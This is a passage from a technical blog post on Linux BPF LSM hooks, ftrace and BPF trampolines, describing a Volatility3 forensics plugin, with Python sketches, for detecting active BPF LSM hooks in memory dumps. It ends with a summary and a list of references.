machinery that drives <code class="language-plaintext highlighter-rouge">trace-cmd</code>. If you’d <code class="language-plaintext highlighter-rouge">strace</code> it, you would see
that it’s doing most of its magic by reading and writing files in
tracefs, the user space interface of ftrace. Furthermore, ftrace can
also be used by kernel modules to install callbacks into their code.</p>

<p>BPF trampolines on the other hand are used to jump into all kinds of
BPF programs, not only LSM-related ones. Numerous flags control
their generation, and the layout we described above
is just one possible combination. For instance, you could also
generate trampolines that cannot skip the original function and simply
return to it, or trampolines that call BPF programs after the
original function was executed by the trampoline.</p>

<h2 id="digging-through-memory-dumps">Digging Through Memory Dumps</h2>
<p>Now that we are equipped with some background knowledge, we can get back
to the original question:
Given a memory dump of a system, can we reconstruct which BPF LSM hooks
were active?</p>

<p>For this part, we’re going to use
<a href="https://github.com/volatilityfoundation/volatility3">Volatility3</a>
as a memory forensics
framework and implement our feature as a plugin.
You can find the source code
<a href="https://github.com/vobst/BPFVol3/blob/main/src/plugins/bpf_lsm.py">here</a>.
However, the techniques are not tied to a specific framework in any way.</p>

<p>First, we have to find out which hooks are active. For that
purpose, we can simply disassemble all the <code class="language-plaintext highlighter-rouge">bpf_lsm_</code> stub functions
and check if their ftrace nops are replaced by a call. This gives us
the active hooks and the corresponding addresses of the executable
trampoline images.</p>
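<p>A minimal sketch of that check might look as follows. It assumes x86-64, where an inactive ftrace patch site holds a five-byte nop and an active one holds a near call (opcode <code class="language-plaintext highlighter-rouge">0xe8</code>) to the trampoline image; the helper name and the exact nop encoding are illustrative, not part of the Volatility3 API.</p>

```python
import struct

# Common 5-byte nop that ftrace leaves at an inactive patch site on
# x86-64 (the exact encoding can vary between kernel versions).
FTRACE_NOP = bytes.fromhex("0f1f440000")
CALL_OPCODE = 0xE8  # near call with a signed 32-bit displacement

def trampoline_address(site_addr: int, site_bytes: bytes):
    """Return the call target (trampoline image address) if the patch
    site of a bpf_lsm_* stub is active, or None if it is still a nop."""
    if site_bytes[:5] == FTRACE_NOP:
        return None  # hook inactive
    if site_bytes[0] == CALL_OPCODE:
        # call rel32: target = address after the instruction + displacement
        (rel32,) = struct.unpack("<i", site_bytes[1:5])
        return (site_addr + 5 + rel32) & 0xFFFFFFFFFFFFFFFF
    return None  # unexpected bytes: worth a manual look
```

<p>Running something like this over every <code class="language-plaintext highlighter-rouge">bpf_lsm_</code> stub in the dump yields the set of active hooks together with the addresses of their trampoline images.</p>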

<p>Next, we can figure out which programs belong to a given image. There are
at least two approaches that immediately come to mind: disassemble
the trampolines and extract the compiled-in addresses of the program
code and their corresponding metadata structs, or
query higher-level abstractions like BPF link objects.</p>

<p>While the first approach is less susceptible to anti-forensics, it
suffers from a dependence on trampoline code generation. Since we already
know which hooks are active, it’s safe to look for the program information
at places that are easier to manipulate, like the <code class="language-plaintext highlighter-rouge">link_idr</code>, which
contains all BPF link objects in use. If we don’t find a corresponding
program there, it’s considered suspicious, and we will raise an alert.</p>

<p>Figure 4 gives an overview of how BPF link objects can be used
to match trampoline images to links. Iterating the <code class="language-plaintext highlighter-rouge">link_idr</code> gives
us <code class="language-plaintext highlighter-rouge">bpf_link</code> objects. The link type maps directly to
the type of the container structure. Thus, if it indicates a tracing
link we can pivot to the outer struct and use its <code class="language-plaintext highlighter-rouge">trampoline</code> member to
get the address of the executable trampoline image that the link’s
program is attached to.</p>
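<p>As a sketch, the matching step could be expressed like this. The dataclass is a simplified stand-in for the kernel’s <code class="language-plaintext highlighter-rouge">bpf_link</code> and its tracing-link container (in the real plugin these are read from the dump via Volatility3’s symbol tables), and only the fields needed for the matching are modeled.</p>

```python
from dataclasses import dataclass
from typing import Dict, List, Optional

BPF_LINK_TYPE_TRACING = 2  # enum bpf_link_type in uapi/linux/bpf.h

@dataclass
class BpfLink:
    """Simplified stand-in for the kernel's bpf_link (+ container)."""
    prog_id: int
    link_type: int
    trampoline_image: Optional[int] = None  # only tracing links have one

def match_hooks_to_progs(active_hooks: Dict[str, int],
                         link_idr: List[BpfLink]) -> Dict[str, List[int]]:
    """Map each active hook (name -> trampoline image address) to the IDs
    of the programs whose tracing link points at that image."""
    matches: Dict[str, List[int]] = {hook: [] for hook in active_hooks}
    for link in link_idr:
        if link.link_type != BPF_LINK_TYPE_TRACING:
            continue  # other link types do not reference a trampoline
        for hook, image in active_hooks.items():
            if link.trampoline_image == image:
                matches[hook].append(link.prog_id)
    return matches
```

<p>Conversely, a trampoline image for which this search turns up no link at all is exactly the suspicious case mentioned above.</p>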

<p><img src="/media/lsm2bpf/link_to_tramp.jpg" alt="Figure 4: Matching BPF links to trampolines" /></p>

<p>Putting it all together, we can find all active BPF LSM hooks as well
as all programs attached to them. You can find the full Volatility
plugin code that implements the above approach in our BPF plugin suite
on
<a href="https://github.com/vobst/BPFVol3">GitHub</a>.
Running it against a memory image of a system that uses our toy LSM
correctly reports activity on two hooks.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>./vol.py -f /io/dumps/mini_lsm_w_dummy.elf -v linux.bpf_lsm
...
LSM HOOK	Nr. PROGS	IDs

bpf_lsm_bprm_creds_for_exec	2	16,18

bpf_lsm_inode_unlink	1	19
</code></pre></div></div>
<p>Note that we have added a second program to <code class="language-plaintext highlighter-rouge">bprm_creds_for_exec</code>
in order to cover the case where more than one program is attached to a
single hook. You can now use the
program IDs with other plugins like <code class="language-plaintext highlighter-rouge">bpf_listprogs</code> to continue your
investigation. The memory image can be downloaded
<a href="https://owncloud.fraunhofer.de/index.php/s/sAXBW6HycFAqbio">here</a>
and the symbols are provided
<a href="https://github.com/vobst/golb-lsm2bpf/blob/master/18c2747e19df38432fbfbdf4ed36921c.isf.json">here</a>.</p>

<h2 id="wrapup">Wrapup</h2>

<p>In this post, we learned about LSMs, a cornerstone of building
high-security Linux systems, and their programmability through modern
BPF. On the way we met two core parts of Linux’s tracing infrastructure:
ftrace and BPF trampolines. In the end, we leveraged this knowledge to
build a memory forensics tool capable of detecting a subtle way in which
malware might infect a system.</p>

<h2 id="references">References</h2>
<p>[1] “Building a Security Tracing Utility To Snoop Into the Linux Kernel.” https://lumontec.com/1-building-a-security-tracing</p>

<p>[2] “ChromeOS: Noexec File System Bypass Using Memfd.” https://bugs.chromium.org/p/chromium/issues/detail?id=916146</p>

<p>[3] “Commit: bpf: Introduce BPF Trampoline.” [Online]. Available: https://github.com/torvalds/linux/commit/fec56f5890d93fc2ed74166c397dc186b1c25951</p>

<p>[4] “eBPF: Block Linux Fileless Payload ‘Malware’ Execution With BPF LSM.” https://djalal.opendz.org/post/ebpf-block-linux-fileless-payload-execution-with-bpf-lsm/</p>

<p>[5] “Elixir: arch/x86 arch_prepare_bpf_trampoline.” [Online]. Available: https://elixir.bootlin.com/linux/latest/source/arch/x86/net/bpf_jit_comp.c#L2128</p>

<p>[6] “FOSDEM 2020: Kernel Runtime Security Instrumentation LSM+BPF=KRSI,” Jan. 02, 2020. [Online]. Available: https://archive.fosdem.org/2020/schedule/event/security_kernel_runtime_security_instrumentation/</p>

<p>[7] “Google Help: retpoline.” [Online]. Available: https://support.google.com/faqs/answer/7625886?hl=en</p>

<p>[8] “KPsingh‘s Kernel Tree.” [Online]. Available: https://github.com/sinkap/linux-krsi/blob/patch/v1/examples/samples/bpf/lsm_detect_exec_unlink.c</p>

<p>[9] “KRSI PATCHv1.” [Online]. Available: https://lwn.net/ml/linux-kernel/20191220154208.15895-1-kpsingh@chromium.org/</p>

<p>[10] “KRSI PATCHv9 (final).” [Online]. Available: https://patchwork.kernel.org/project/linux-security-module/cover/20200329004356.27286-1-kpsingh@chromium.org/</p>

<p>[11] “KRSI RFCv1,” Oct. 09, 2019. [Online]. Available: https://lore.kernel.org/bpf/20190910115527.5235-1-kpsingh@chromium.org/#r</p>

<p>[12] “Linux Security Modules: General Security Support for the Linux Kernel”.</p>

<p>[13] “Linux Security Summit NA 2019: Kernel Runtime Security Instrumentation - KP Singh, Google,” Oct. 02, 2019. [Online]. Available: https://www.youtube.com/watch?v=2CZSSRfgAgQ</p>

<p>[14] “Linux Security Summit NA 2020: KRSI (BPF + LSM) - Updates and Progress - KP Singh, Google,” Jul. 01, 2020. [Online]. Available: https://lssna2020.sched.com/event/c74F/krsi-bpf-lsm-updates-and-progress-kp-singh-google</p>

<p>[15] “LPC 2020: BPF LSM (Updates + Progress),” Aug. 25, 2020. [Online]. Available: https://lpc.events/event/7/contributions/680/</p>

<p>[16] “LWN: bpf: add ambient BPF runtime context stored in current.” https://lwn.net/Articles/862539/</p>

<p>[17] “LWN: Enabling Non-Executable Memfds.” https://lwn.net/Articles/918106/</p>

<p>[18] “LWN: Impedance Matching for BPF and LSM,” Feb. 26, 2020. https://lwn.net/Articles/813261/</p>

<p>[19] “LWN: Kernel Runtime Security Instrumentation.” https://lwn.net/Articles/798157/</p>

<p>[20] “LWN: KRSI — The Other BPF Security Module,” Dec. 27, 2019. https://lwn.net/Articles/808048/</p>

<p>[21] “LWN: KRSI and Proprietary BPF Programs,” Jan. 17, 2020. https://lwn.net/Articles/809841/</p>

<p>[22] “Mitigating Attacks on a Supercomputer With KRSI.”</p>

<p>[23] “[PATCH bpf-next 0/4] Reduce overhead of LSMs with static calls.” [Online]. Available: https://lore.kernel.org/bpf/202301201137.93A66D1C76@keescook/T/#ma6a93c345ad38764bef97c18c982c11ab1cf0c0f</p>

<p>[24] “[PATCH v4 bpf-next 00/20] Introduce BPF trampoline.” [Online]. Available: https://lore.kernel.org/bpf/20191114185720.1641606-1-ast@kernel.org/#t</p>

<p>[25] “[RFC] security: replace indirect calls with static calls.” [Online]. Available: https://lore.kernel.org/bpf/20200820164753.3256899-1-jackmanb@chromium.org/</p>

<p>[26] “Static Calls in Linux 5.10.” https://blog.yossarian.net/2020/12/16/Static-calls-in-Linux-5-10</p>

<p>[27] “The Design and Implementation of Userland Exec”, [Online]. Available: https://grugq.github.io/docs/ul_exec.txt</p>

<p>[28] “Volatility3.” [Online]. Available: https://github.com/volatilityfoundation/volatility3</p>]]></content><author><name></name></author><summary type="html"><![CDATA[Back in 2001, the Linux Security Module (LSM) subsystem made its way into the mainline kernel. Almost 10 years ago, in September 2014, the modern BPF virtual machine (VM) landed in the tree. In late 2019, KP Singh proposed a patchset that facilitates the creation of modules for the former that run on the latter - Kernel Runtime Security Instrumentation (KRSI) was born.]]></summary></entry></feed>